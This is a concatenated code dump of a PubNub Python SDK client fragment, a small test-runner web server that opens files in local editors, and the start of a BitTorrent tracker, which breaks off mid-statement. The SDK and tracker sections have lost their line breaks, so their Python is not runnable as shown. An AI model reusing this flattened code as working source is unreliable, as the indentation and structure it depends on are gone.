chobj['connected'] is True: if chobj['disconnected'] is False: chobj['disconnected'] = True _invoke(chobj['disconnect'], chobj['name']) if self._channel_group_list_lock: with self._channel_group_list_lock: for ch in self.subscription_groups: chobj = self.subscription_groups[ch] if chobj['connected'] is True: if chobj['disconnected'] is False: chobj['disconnected'] = True _invoke(chobj['disconnect'], chobj['name']) def _invoke_error(channel_list=None, error=None): if channel_list is None: for ch in self.subscriptions: chobj = self.subscriptions[ch] try: _invoke(chobj['error'], error, ch) except TypeError: _invoke(chobj['error'], error) else: for ch in channel_list: chobj = self.subscriptions[ch] try: _invoke(chobj['error'], error, ch) except TypeError: _invoke(chobj['error'], error) def _get_channel(): for ch in self.subscriptions: chobj = self.subscriptions[ch] if chobj['subscribed'] is True: return chobj if channels is not None: channels = channels if isinstance( channels, list) else channels.split(",") for channel in channels: ## New Channel? if len(channel) > 0 and \ (not channel in self.subscriptions or self.subscriptions[channel]['subscribed'] is False): with self._channel_list_lock: self.subscriptions[channel] = { 'name': channel, 'first': False, 'connected': False, 'disconnected': True, 'subscribed': True, 'callback': callback, 'connect': connect, 'disconnect': disconnect, 'reconnect': reconnect, 'error': error, 'presence': presence } if state is not None: if channel in self.STATE: self.STATE[channel] = state[channel] else: self.STATE[channel] = state if channel_groups is not None: channel_groups = channel_groups if isinstance( channel_groups, list) else channel_groups.split(",") for channel_group in channel_groups: ## New Channel? if len(channel_group) > 0 and \ (not channel_group in self.subscription_groups or self.subscription_groups[channel_group]['subscribed'] is False): with self._channel_group_list_lock: self.subscription_groups[channel_group] = { 'name': channel_group, 'first': False, 'connected': False, 'disconnected': True, 'subscribed': True, 'callback': callback, 'connect': connect, 'disconnect': disconnect, 'reconnect': reconnect, 'error': error, 'presence': presence } ''' ## return if already connected to channel if channel in self.subscriptions and \ 'connected' in self.subscriptions[channel] and \ self.subscriptions[channel]['connected'] is True: _invoke(error, "Already Connected") return ''' ## SUBSCRIPTION RECURSION def _connect(): self._reset_offline() def error_callback(response): ## ERROR ? if not response or \ ('message' in response and response['message'] == 'Forbidden'): _invoke_error(channel_list=response['payload'][ 'channels'], error=response['message']) self.timeout(1, _connect) return if 'message' in response: _invoke_error(error=response['message']) else: _invoke_disconnect() self.timetoken = 0 self.timeout(1, _connect) def sub_callback(response): ## ERROR ? 
if not response or \ ('message' in response and response['message'] == 'Forbidden'): _invoke_error(channel_list=response['payload'][ 'channels'], error=response['message']) _connect() return _invoke_connect() with self._tt_lock: self.timetoken = \ self.last_timetoken if self.timetoken == 0 and \ self.last_timetoken != 0 else response[1] if len(response) > 3: channel_list = response[2].split(',') channel_list_2 = response[3].split(',') response_list = response[0] for ch in enumerate(channel_list): if ch[1] in self.subscription_groups or ch[1] in self.subscriptions: try: chobj = self.subscription_groups[ch[1]] except KeyError: chobj = self.subscriptions[ch[1]] if ('-pnpres' in channel_list_2[ch[0]]): cb = chobj['presence'] else: cb = chobj['callback'] _invoke(cb, self.decrypt(response_list[ch[0]]), chobj['name'].split('-pnpres')[0], channel_list_2[ch[0]].split('-pnpres')[0]) elif len(response) > 2: channel_list = response[2].split(',') response_list = response[0] for ch in enumerate(channel_list): if ch[1] in self.subscriptions: chobj = self.subscriptions[ch[1]] _invoke(chobj['callback'], self.decrypt(response_list[ch[0]]), chobj['name'].split('-pnpres')[0]) else: response_list = response[0] chobj = _get_channel() for r in response_list: if chobj: _invoke(chobj['callback'], self.decrypt(r), chobj['name'].split('-pnpres')[0]) _connect() channel_list = self.get_channel_list(self.subscriptions) channel_group_list = self.get_channel_group_list(self.subscription_groups) if len(channel_list) <= 0 and len(channel_group_list) <= 0: return if len(channel_list) <= 0: channel_list = ',' data = {"uuid": self.uuid, "auth": self.auth_key, 'pnsdk' : self.pnsdk, 'channel-group' : channel_group_list} st = json.dumps(self.STATE) if len(st) > 2: data['state'] = quote(st,safe="") ## CONNECT TO PUBNUB SUBSCRIBE SERVERS #try: self.SUB_RECEIVER = self._request({"urlcomponents": [ 'subscribe', self.subscribe_key, channel_list, '0', str(self.timetoken) ], "urlparams": data}, sub_callback, error_callback, single=True, timeout=320) ''' except Exception as e: print(e) self.timeout(1, _connect) return ''' self._connect = _connect ## BEGIN SUBSCRIPTION (LISTEN FOR MESSAGES) _connect() def _reset_offline(self): if self.SUB_RECEIVER is not None: self.SUB_RECEIVER() self.SUB_RECEIVER = None def CONNECT(self): self._reset_offline() self._connect() def unsubscribe(self, channel): """Unsubscribe from channel . Only works in async mode Args: channel: Channel name ( string ) """ if channel in self.subscriptions is False: return False ## DISCONNECT with self._channel_list_lock: if channel in self.subscriptions: self.subscriptions[channel]['connected'] = 0 self.subscriptions[channel]['subscribed'] = False self.subscriptions[channel]['timetoken'] = 0 self.subscriptions[channel]['first'] = False self.leave_channel(channel=channel) # remove channel from STATE self.STATE.pop(channel, None) self.CONNECT() def unsubscribe_group(self, channel_group): """Unsubscribe from channel group. 
Only works in async mode Args: channel_group: Channel group name ( string ) """ if channel_group in self.subscription_groups is False: return False ## DISCONNECT with self._channel_group_list_lock: if channel_group in self.subscription_groups: self.subscription_groups[channel_group]['connected'] = 0 self.subscription_groups[channel_group]['subscribed'] = False self.subscription_groups[channel_group]['timetoken'] = 0 self.subscription_groups[channel_group]['first'] = False self.leave_group(channel_group=channel_group) self.CONNECT() class PubnubCore(PubnubCoreAsync): def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, _tt_lock=None, _channel_list_lock=None, _channel_group_list_lock=None ): super(PubnubCore, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid, _tt_lock=_tt_lock, _channel_list_lock=_channel_list_lock, _channel_group_list_lock=_channel_group_list_lock ) self.subscriptions = {} self.timetoken = 0 self.accept_encoding = 'gzip' class HTTPClient: def __init__(self, pubnub, url, urllib_func=None, callback=None, error=None, id=None, timeout=5): self.url = url self.id = id self.callback = callback self.error = error self.stop = False self._urllib_func = urllib_func self.timeout = timeout self.pubnub = pubnub def cancel(self): self.stop = True self.callback = None self.error = None def run(self): def _invoke(func, data): if func is not None: func(get_data_for_user(data)) if self._urllib_func is None: return resp = self._urllib_func(self.url, timeout=self.timeout) data = resp[0] code = resp[1] if self.stop is True: return if self.callback is None: with self.pubnub.latest_sub_callback_lock: if self.pubnub.latest_sub_callback['id'] != self.id: return else: if self.pubnub.latest_sub_callback['callback'] is not None: self.pubnub.latest_sub_callback['id'] = 0 try: data = json.loads(data) except ValueError: _invoke(self.pubnub.latest_sub_callback['error'], {'error': 'json decoding error'}) return if code != 200: _invoke(self.pubnub.latest_sub_callback['error'], data) else: _invoke(self.pubnub.latest_sub_callback['callback'], data) else: try: data = json.loads(data) except ValueError: _invoke(self.error, {'error': 'json decoding error'}) return if code != 200: _invoke(self.error, data) else: _invoke(self.callback, data) def _urllib_request_2(url, timeout=5): try: resp = urllib2.urlopen(url, timeout=timeout) except urllib2.HTTPError as http_error: resp = http_error except urllib2.URLError as error: msg = {"message": str(error.reason)} return (json.dumps(msg), 0) return (resp.read(), resp.code) class PubnubHTTPAdapter(HTTPAdapter): def init_poolmanager(self, *args, **kwargs): kwargs.setdefault('socket_options', default_socket_options) super(PubnubHTTPAdapter, self).init_poolmanager(*args, **kwargs) s = requests.Session() #s.mount('http://', PubnubHTTPAdapter(max_retries=1)) #s.mount('https://', PubnubHTTPAdapter(max_retries=1)) #s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) #s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) def _requests_request(url, timeout=5): #print url try: resp = s.get(url, timeout=timeout) except requests.exceptions.HTTPError as http_error: resp = http_error except requests.exceptions.ConnectionError as error: msg = str(error) return (json.dumps(msg), 0) except requests.exceptions.Timeout as error: msg = str(error) return 
(json.dumps(msg), 0) #print (resp.text) #print (resp.status_code) return (resp.text, resp.status_code) def _urllib_request_3(url, timeout=5): try: resp = urllib.request.urlopen(url, timeout=timeout) except (urllib.request.HTTPError, urllib.request.URLError) as http_error: resp = http_error r = resp.read().decode("utf-8") return (r, resp.code) _urllib_request = None # Pubnub class Pubnub(PubnubCore): def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, pooling=True, daemon=False, pres_uuid=None, azure=False ): super(Pubnub, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid or pres_uuid, _tt_lock=threading.RLock(), _channel_list_lock=threading.RLock(), _channel_group_list_lock=threading.RLock() ) global _urllib_request if self.python_version == 2: _urllib_request = _urllib_request_2 else: _urllib_request = _urllib_request_3 if pooling is True: _urllib_request = _requests_request self.latest_sub_callback_lock = threading.RLock() self.latest_sub_callback = {'id': None, 'callback': None} self.pnsdk = 'PubNub-Python' + '/' + self.version self.daemon = daemon if azure is False: s.mount('http://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) s.mount('https://pubsub.pubnub.com', HTTPAdapter(max_retries=1)) else: s.mount('http://', PubnubHTTPAdapter(max_retries=1)) s.mount('https://', PubnubHTTPAdapter(max_retries=1)) def timeout(self, interval, func): def cb(): time.sleep(interval) func() thread = threading.Thread(target=cb) thread.daemon = self.daemon thread.start() def _request_async(self, request, callback=None, error=None, single=False, timeout=5): global _urllib_request ## Build URL url = self.getUrl(request) if single is True: id = time.time() client = HTTPClient(self, url=url, urllib_func=_urllib_request, callback=None, error=None, id=id, timeout=timeout) with self.latest_sub_callback_lock: self.latest_sub_callback['id'] = id self.latest_sub_callback['callback'] = callback self.latest_sub_callback['error'] = error else: client = HTTPClient(self, url=url, urllib_func=_urllib_request, callback=callback, error=error, timeout=timeout) thread = threading.Thread(target=client.run) thread.daemon = self.daemon thread.start() def abort(): client.cancel() return abort def _request_sync(self, request, timeout=5): global _urllib_request ## Build URL url = self.getUrl(request) ## Send Request Expecting JSONP Response response = _urllib_request(url, timeout=timeout) try: resp_json = json.loads(response[0]) except ValueError: return [0, "JSON Error"] if response[1] != 200 and 'message' in resp_json and 'payload' in resp_json: return {'message': resp_json['message'], 'payload': resp_json['payload']} if response[1] == 0: return [0, resp_json] return resp_json def _request(self, request, callback=None, error=None, single=False, timeout=5): if callback is None: return get_data_for_user(self._request_sync(request, timeout=timeout)) else: return self._request_async(request, callback, error, single=single, timeout=timeout) # Pubnub Twisted class PubnubTwisted(PubnubCoreAsync): def start(self): reactor.run() def stop(self): reactor.stop() def timeout(self, delay, callback): reactor.callLater(delay, callback) def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com' ): super(PubnubTwisted, self).__init__( 
publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, ) self.headers = {} self.headers['User-Agent'] = ['Python-Twisted'] self.headers['V'] = [self.version] self.pnsdk = 'PubNub-Python-' + 'Twisted' + '/' + self.version def _request(self, request, callback=None, error=None, single=False, timeout=5): global pnconn_pool def _invoke(func, data): if func is not None: func(get_data_for_user(data)) ## Build URL url = self.getUrl(request) agent = ContentDecoderAgent(RedirectAgent(Agent( reactor, contextFactory=WebClientContextFactory(), pool=self.ssl and None or pnconn_pool )), [('gzip', GzipDecoder)]) try: request = agent.request( 'GET', url, Headers(self.headers), None) except TypeError: request = agent.request( 'GET', url.encode(), Headers(self.headers), None) if single is True: id = time.time() self.id = id def received(response): if not isinstance(response, twisted.web._newclient.Response): _invoke(error, {"message": "Not Found"}) return finished = Deferred() if response.code in [401, 403]: response.deliverBody(PubNubPamResponse(finished)) else: response.deliverBody(PubNubResponse(finished)) return finished def complete(data): if single is True: if id != self.id: return None try: data = json.loads(data) except ValueError: try: data = json.loads(data.decode("utf-8")) except ValueError: _invoke(error, {'error': 'json decode error'}) if 'error' in data and 'status' in data and 'status' != 200: _invoke(error, data) else: _invoke(callback, data) def abort(): pass request.addCallback(received) request.addCallback(complete) return abort # PubnubTornado class PubnubTornado(PubnubCoreAsync): def stop(self): ioloop.stop() def start(self): ioloop.start() def timeout(self, delay, callback): ioloop.add_timeout(time.time() + float(delay), callback) def __init__( self, publish_key, subscribe_key, secret_key=False, cipher_key=False, auth_key=False, ssl_on=False, origin='pubsub.pubnub.com' ): super(PubnubTornado, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, ) self.headers = {} self.headers['User-Agent'] = 'Python-Tornado' self.headers['Accept-Encoding'] = self.accept_encoding self.headers['V'] = self.version self.http = tornado.httpclient.AsyncHTTPClient(max_clients=1000) self.id = None self.pnsdk = 'PubNub-Python-' + 'Tornado' + '/' + self.version def _request(self, request, callback=None, error=None, single=False, timeout=5, connect_timeout=5): def _invoke(func, data): if func is not None: func(get_data_for_user(data)) url = self.getUrl(request) request = tornado.httpclient.HTTPRequest( url, 'GET', self.headers, connect_timeout=connect_timeout, request_timeout=timeout) if single is True: id = time.time() self.id = id def responseCallback(response): if single is True: if not id == self.id: return None body = response._get_body() if body is None: return def handle_exc(*args): return True if response.error is not None: with ExceptionStackContext(handle_exc): if response.code in [403, 401]: response.rethrow() else: _invoke(error, {"message": response.reason}) return try: data = json.loads(body) except TypeError: try: data = json.loads(body.decode("utf-8")) except ValueError: _invoke(error, {'error': 'json decode error'}) if 'error' in data and 'status' in data and 'status' != 200: _invoke(error, data) else: _invoke(callback, data) self.http.fetch( request=request, callback=responseCallback ) def 
abort(): pass return abort
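# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original SDK source). It shows,
# in a hedged way, how the blocking `Pubnub` class defined above is typically
# driven, based only on the docstrings in this file: publish() returns
# [1, "Sent", "<timetoken>"] in sync mode, subscribe() only works in async
# mode via callbacks, and history() returns stored messages. The 'demo' keys,
# the channel name and the callback names below are placeholders, not values
# taken from the original source.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    def _on_message(message, channel):
        # Fired on the worker thread started by _request_async().
        print(channel, message)

    def _on_error(err):
        print('error:', err)

    pubnub = Pubnub(publish_key='demo', subscribe_key='demo')

    # Sync mode (no callback given): blocks and returns the parsed response.
    print(pubnub.publish(channel='my_channel', message={'text': 'hello'}))
    print(pubnub.history(channel='my_channel', count=5))

    # Async mode: messages are delivered to the callback until the process exits.
    pubnub.subscribe(channels='my_channel', callback=_on_message,
                     error=_on_error)
    time.sleep(30)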
webserver.py
import time
import threading
import traceback
import json
import nose
import sys
import linecache
import inspect
import os.path
import queue as queue
import urllib.parse

from io import StringIO
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver as socketserver

from mpi4py import MPI
from nose.plugins.capture import Capture
from nose.plugins.skip import Skip, SkipTest
from nose.core import TestProgram
from multiprocessing import Process, Queue
from optparse import OptionParser
from subprocess import call, Popen, PIPE

EDITOR = None

osascript_to_open_xcode = """on run argv
    set linenumber to (item 1 of argv) as integer
    set filename_string to item 2 of argv
    set file_to_open to POSIX file filename_string
    tell application "Xcode"
        activate
        set doc_to_edit to (open file_to_open)
        tell doc_to_edit
            set its selection to item linenumber of paragraph of it
        end tell
    end tell
end run"""


def open_file(path, lineno = 1):
    global EDITOR

    if sys.platform == 'darwin':
        program = Popen(
            ['osascript', '-', str(lineno), os.path.join(os.getcwd(), path)],
            stdin = PIPE,
            stdout = PIPE,
            stderr = PIPE)
        out, err = program.communicate(osascript_to_open_xcode)
    else:
        possible_programs = (
            ['geany', path, '+' + str(lineno)],
            ['kate', '-u', '--line', str(lineno), path],
            ['emacs', '+' + str(lineno), path],
            ['nedit-client', '-line', str(lineno), path],
        )
        for program in possible_programs:
            if program[0] == EDITOR:
                returncode = call(['which', program[0]])
                if returncode == 0:
                    call(program)
                    return
        for program in possible_programs:
            returncode = call(['which', program[0]])
            if returncode == 0:
                call(program)
                return
        call([EDITOR, path])


class HandleRequest(BaseHTTPRequestHandler):

    def do_GET(self):
        self.parsed_path = urllib.parse.urlparse(self.path)
        path = self.parsed_path.path[1:]
        method_name = 'do_' + path
        if hasattr(self, method_name):
            method = getattr(self, method_name)
            string, content_type = method()
        else:
            if path.endswith(".js"):
                string, content_type = self.javascript_file(path)
            else:
                string, content_type = self.index_file()

        self.send_response(200)
        self.send_header("Content-type", content_type)
        self.send_header("Content-Length", str(len(string)))
        self.end_headers()
        self.wfile.write(string)

    def do_long_poll(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/javascript")
        self.send_header("Transfer-Encoding", "chunked")
        self.send_header("Cache-Control", "no-cache, no-store")
        self.send_header("Pragma", "no-cache")
        self.end_headers()

        while True:
            self.server.tests_finished.wait(10.0)
            if self.server.tests_finished.is_set():
                self.send_chunk('true')
                self.server.tests_finished.clear()
            else:
                self.send_chunk('false')

        self.wfile.write('0\r\n\r\n')
        self.wfile.flush()

    def send_chunk(self, string):
        hex_length = hex(len(string))[2:]
        self.wfile.write('%s \r\n' % hex_length)
        self.wfile.flush()
        self.wfile.write(string)
        self.wfile.write('\r\n')
        self.wfile.flush()

    def index_file(self):
        base = os.path.split(__file__)[0]
        filename = os.path.join(base, "realtime_test.html")
        with open(filename, "r") as file:
            contents = file.read()
        return contents, 'text/html'

    def javascript_file(self, path):
        base = os.path.split(__file__)[0]
        filename = os.path.join(base, path)
        if not os.path.exists(path):
            return '', 'text/javascript'
        with open(filename, "r") as file:
            contents = file.read()
        return contents, 'text/javascript'

    def log_message(self, format, *args):
        pass
        #sys.stderr.write("%s - - [%s] %s\n" %
        #                 (self.address_string(),
        #                  self.log_date_time_string(),
        #                  format%args))

    def do_stop(self):
        thread = threading.Thread(target=self.server.stop)
        thread.daemon = True
        thread.start()
        return 'null', 'text/javascript'

    def do_events(self):
        new_events = self.server.get_all_events_since_previous_query()
        string = json.dumps(new_events)
        content_type = 'text/javascript'
        return string, content_type

    def do_open_file(self):
        parameters = urllib.parse.parse_qs(self.parsed_path.query)
        path = parameters['path'][0]
        lineno = int(parameters['lineno'][0])
        open_file(path, lineno)
        string = 'null'
        content_type = 'text/javascript'
        return string, content_type


class WebServer(socketserver.ThreadingMixIn, HTTPServer):

    def __init__(self, port, request_handler):
        HTTPServer.__init__(self, ('', port), request_handler)
        self.daemon_threads = True
        self.events_queue = queue.Queue()

    def start(self):
        self.serve_forever()

    def stop(self):
        self.shutdown()

    def get_all_events_since_previous_query(self):
        try:
            events = []
            while True:
                events.append(self.events_queue.get(False))
        except queue.Empty:
            pass
        return events
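# ---------------------------------------------------------------------------
# Illustrative wiring sketch (not part of the original file). It shows one
# plausible way to drive the WebServer/HandleRequest pair above. The port
# number and the event payload are placeholders, and the `tests_finished`
# Event is an assumption inferred from do_long_poll(), which expects the
# server object to expose such an attribute.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    server = WebServer(9080, HandleRequest)
    server.tests_finished = threading.Event()  # polled by GET /long_poll

    # Anything put on this queue is drained and returned by GET /events.
    server.events_queue.put({'type': 'test-started', 'name': 'example'})

    # serve_forever() blocks; GET /stop shuts the server down from the page.
    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()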
track.py
# Written by Bram Cohen # see LICENSE.txt for license information from OCSBttrack.parseargs import parseargs, formatDefinitions from OCSBttrack.RawServer import RawServer, autodetect_ipv6, autodetect_socket_style from OCSBttrack.HTTPHandler import HTTPHandler, months, weekdays from OCSBttrack.parsedir import parsedir from NatCheck import NatCheck, CHECK_PEER_ID_ENCRYPTED from OCSBttrack.BTcrypto import CRYPTO_OK from T2T import T2TList from OCSBttrack.subnetparse import IP_List, ipv6_to_ipv4, to_ipv4, is_valid_ip, is_ipv4 from OCSBttrack.iprangeparse import IP_List as IP_Range_List from OCSBttrack.torrentlistparse import parsetorrentlist from threading import Event, Thread from OCSBttrack.bencode import bencode, bdecode, Bencached from OCSBttrack.zurllib import urlopen, quote, unquote from Filter import Filter from urlparse import urlparse from os import rename, getpid from os.path import exists, isfile from cStringIO import StringIO from traceback import print_exc from time import time, gmtime, strftime, localtime from OCSBttrack.clock import clock from random import shuffle, seed, randrange from types import StringType, IntType, LongType, ListType, DictType from binascii import b2a_hex, a2b_hex, a2b_base64 from string import lower import sys, os import signal import re import OCSBttrack.__init__ from OCSBttrack.__init__ import version, createPeerID try: True except: True = 1 False = 0 bool = lambda x: not not x defaults = [ ('tracker_timeout', 0, "Time to stop tracker"), ('tracker_max_completed', 0, "Stop tracker via count of transfer completed"), ('port', 80, "Port to listen on."), ('dfile', None, 'file to store recent downloader info in'), ('bind', '', 'comma-separated list of ips/hostnames to bind to locally'), # ('ipv6_enabled', autodetect_ipv6(), ('ipv6_enabled', 0, 'allow the client to connect to peers via IPv6'), ('ipv6_binds_v4', autodetect_socket_style(), 'set if an IPv6 server socket will also field IPv4 connections'), ('socket_timeout', 15, 'timeout for closing connections'), ('save_dfile_interval', 5 * 60, 'seconds between saving dfile'), ('timeout_downloaders_interval', 45 * 60, 'seconds between expiring downloaders'), ('reannounce_interval', 30 * 60, 'seconds downloaders should wait between reannouncements'), ('response_size', 50, 'number of peers to send in an info message'), ('timeout_check_interval', 5, 'time to wait between checking if any connections have timed out'), ('nat_check', 3, "how many times to check if a downloader is behind a NAT (0 = don't check)"), ('log_nat_checks', 0, "whether to add entries to the log for nat-check results"), ('min_time_between_log_flushes', 3.0, 'minimum time it must have been since the last flush to do another one'), ('min_time_between_cache_refreshes', 600.0, 'minimum time in seconds before a cache is considered stale and is flushed'), ('allowed_dir', '', 'only allow downloads for .torrents in this dir'), ('allowed_list', '', 'only allow downloads for hashes in this list (hex format, one per line)'), ('allowed_controls', 0, 'allow special keys in torrents in the allowed_dir to affect tracker access'), ('multitracker_enabled', 0, 'whether to enable multitracker operation'), ('multitracker_allowed', 'autodetect', 'whether to allow incoming tracker announces (can be none, autodetect or all)'), ('multitracker_reannounce_interval', 2 * 60, 'seconds between outgoing tracker announces'), ('multitracker_maxpeers', 20, 'number of peers to get in a tracker announce'), ('aggregate_forward', '', 'format: <url>[,<password>] - if set, forwards all 
non-multitracker to this url with this optional password'), ('aggregator', '0', 'whether to act as a data aggregator rather than a tracker. If enabled, may be 1, or <password>; ' + 'if password is set, then an incoming password is required for access'), ('hupmonitor', 0, 'whether to reopen the log file upon receipt of HUP signal'), ('http_timeout', 60, 'number of seconds to wait before assuming that an http connection has timed out'), ('parse_dir_interval', 60, 'seconds between reloading of allowed_dir or allowed_file ' + 'and allowed_ips and banned_ips lists'), ('show_infopage', 1, "whether to display an info page when the tracker's root dir is loaded"), ('infopage_redirect', '', 'a URL to redirect the info page to'), ('show_names', 1, 'whether to display names from allowed dir'), ('favicon', '', 'file containing x-icon data to return when browser requests favicon.ico'), ('allowed_ips', '', 'only allow connections from IPs specified in the given file; '+ 'file contains subnet data in the format: aa.bb.cc.dd/len'), ('banned_ips', '', "don't allow connections from IPs specified in the given file; "+ 'file contains IP range data in the format: xxx:xxx:ip1-ip2'), ('only_local_override_ip', 2, "ignore the ip GET parameter from machines which aren't on local network IPs " + "(0 = never, 1 = always, 2 = ignore if NAT checking is not enabled)"), ('logfile', '', 'file to write the tracker logs, use - for stdout (default)'), ('allow_get', 0, 'use with allowed_dir; adds a /file?hash={hash} url that allows users to download the torrent file'), ('keep_dead', 0, 'keep dead torrents after they expire (so they still show up on your /scrape and web page)'), ('scrape_allowed', 'full', 'scrape access allowed (can be none, specific or full)'), ('dedicated_seed_id', '', 'allows tracker to monitor dedicated seed(s) and flag torrents as seeded'), ('compact_reqd', 1, "only allow peers that accept a compact response"), ] def statefiletemplate(x): if type(x) != DictType: raise ValueError for cname, cinfo in x.items(): if cname == 'peers': for y in cinfo.values(): # The 'peers' key is a dictionary of SHA hashes (torrent ids) if type(y) != DictType: # ... for the active torrents, and each is a dictionary raise ValueError for id, info in y.items(): # ... of client ids interested in that torrent if (len(id) != 20): raise ValueError if type(info) != DictType: # ... each of which is also a dictionary raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent if type(info.get('ip', '')) != StringType: raise ValueError port = info.get('port') if type(port) not in (IntType,LongType) or port < 0: raise ValueError left = info.get('left') if type(left) not in (IntType,LongType) or left < 0: raise ValueError if type(info.get('supportcrypto')) not in (IntType,LongType): raise ValueError if type(info.get('requirecrypto')) not in (IntType,LongType): raise ValueError elif cname == 'completed': if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids) raise ValueError # ... for keeping track of the total completions per torrent for y in cinfo.values(): # ... each torrent has an integer value if type(y) not in (IntType,LongType): raise ValueError # ... 
for the number of reported completions for that torrent elif cname == 'allowed': if (type(cinfo) != DictType): # a list of info_hashes and included data raise ValueError if x.has_key('allowed_dir_files'): adlist = [z[1] for z in x['allowed_dir_files'].values()] for y in cinfo.keys(): # and each should have a corresponding key here if not y in adlist: raise ValueError elif cname == 'allowed_dir_files': if (type(cinfo) != DictType): # a list of files, their attributes and info hashes raise ValueError dirkeys = {} for y in cinfo.values(): # each entry should have a corresponding info_hash if not y[1]: continue if not x['allowed'].has_key(y[1]): raise ValueError if dirkeys.has_key(y[1]): # and each should have a unique info_hash raise ValueError dirkeys[y[1]] = 1 alas = 'your file may exist elsewhere in the universe\nbut alas, not here\n' local_IPs = IP_List() local_IPs.set_intranet_addresses() def isotime(secs = None): if secs == None: secs = time() return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs)) http_via_filter = re.compile(' for ([0-9.]+)\Z') def _get_forwarded_ip(headers): header = headers.get('x-forwarded-for') if header: try: x,y = header.split(',') except: return header if is_valid_ip(x) and not local_IPs.includes(x): return x return y header = headers.get('client-ip') if header: return header header = headers.get('via') if header: x = http_via_filter.search(header) try: return x.group(1) except: pass header = headers.get('from') #if header: # return header #return None return header def get_forwarded_ip(headers): x = _get_forwarded_ip(headers) if x is None or not is_valid_ip(x) or local_IPs.includes(x): return None return x def compact_peer_info(ip, port): try: s = ( ''.join([chr(int(i)) for i in ip.split('.')]) + chr((port & 0xFF00) >> 8) + chr(port & 0xFF) ) if len(s) != 6: raise ValueError except: s = '' # not a valid IP, must be a domain name return s class Tracker: def __init__(self, config, rawserver): self.completedno = 0 self.config = config self.response_size = config['response_size'] self.dfile = config['dfile'] self.natcheck = config['nat_check'] favicon = config['favicon'] self.parse_dir_interval = config['parse_dir_interval'] self.favicon = None if favicon: try: h = open(favicon,'r') self.favicon = h.read() h.close() except: print "**warning** specified favicon file -- %s -- does not exist." % favicon self.rawserver = rawserver self.cached = {} # format: infohash: [[time1, l1, s1], [time2, l2, s2], ...] 
self.cached_t = {} # format: infohash: [time, cache] self.times = {} self.state = {} self.seedcount = {} self.tracker_inittime = time() self.tracker_timeout = config['tracker_timeout'] self.tracker_max_completed = config['tracker_max_completed'] self.allowed_IPs = None self.banned_IPs = None if config['allowed_ips'] or config['banned_ips']: self.allowed_ip_mtime = 0 self.banned_ip_mtime = 0 self.read_ip_lists() self.only_local_override_ip = config['only_local_override_ip'] if self.only_local_override_ip == 2: self.only_local_override_ip = not config['nat_check'] if CHECK_PEER_ID_ENCRYPTED and not CRYPTO_OK: print ('**warning** crypto library not installed,' + ' cannot completely verify encrypted peers') if exists(self.dfile): try: h = open(self.dfile, 'rb') ds = h.read() h.close() tempstate = bdecode(ds) if not tempstate.has_key('peers'): tempstate = {'peers': tempstate} statefiletemplate(tempstate) self.state = tempstate except: print '**warning** statefile '+self.dfile+' corrupt; resetting' self.downloads = self.state.setdefault('peers', {}) self.completed = self.state.setdefault('completed', {}) self.becache = {} ''' format: infohash: [[l0, s0], [l1, s1], ...] l0,s0 = compact, not requirecrypto=1 l1,s1 = compact, only supportcrypto=1 l2,s2 = [compact, crypto_flag], all peers if --compact_reqd 0: l3,s3 = [ip,port,id] l4,l4 = [ip,port] nopeerid ''' if config['compact_reqd']: self.cache_default_len = 3 else: self.cache_default_len = 5 for infohash, ds in self.downloads.items(): self.seedcount[infohash] = 0 for x,y in ds.items(): ip = y['ip'] if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip)) or (self.banned_IPs and self.banned_IPs.includes(ip)) ): del ds[x] continue if not y['left']: self.seedcount[infohash] += 1 if y.get('nat',-1): continue gip = y.get('given_ip') if is_valid_ip(gip) and ( not self.only_local_override_ip or local_IPs.includes(ip) ): ip = gip self.natcheckOK(infohash,x,ip,y['port'],y) for x in self.downloads.keys(): self.times[x] = {} for y in self.downloads[x].keys(): self.times[x][y] = 0 self.trackerid = createPeerID('-T-') seed(self.trackerid) self.reannounce_interval = config['reannounce_interval'] self.save_dfile_interval = config['save_dfile_interval'] self.show_names = config['show_names'] rawserver.add_task(self.save_state, self.save_dfile_interval) rawserver.add_task(self.test_state_and_finish, 1) self.prevtime = clock() self.timeout_downloaders_interval = config['timeout_downloaders_interval'] rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval) self.logfile = None self.log = None if (config['logfile']) and (config['logfile'] != '-'): try: self.logfile = config['logfile'] self.log = open(self.logfile,'a') sys.stdout = self.log print "# Log Started: ", isotime() except: print "**warning** could not redirect stdout to log file: ", sys.exc_info()[0] if config['hupmonitor']: def huphandler(signum, frame, self = self): try: self.log.close () self.log = open(self.logfile,'a') sys.stdout = self.log print "# Log reopened: ", isotime() except: print "**warning** could not reopen logfile" signal.signal(signal.SIGHUP, huphandler) self.allow_get = config['allow_get'] self.t2tlist = T2TList(config['multitracker_enabled'], self.trackerid, config['multitracker_reannounce_interval'], config['multitracker_maxpeers'], config['http_timeout'], self.rawserver) if config['allowed_list']: if config['allowed_dir']: print '**warning** allowed_dir and allowed_list options cannot be used together' print 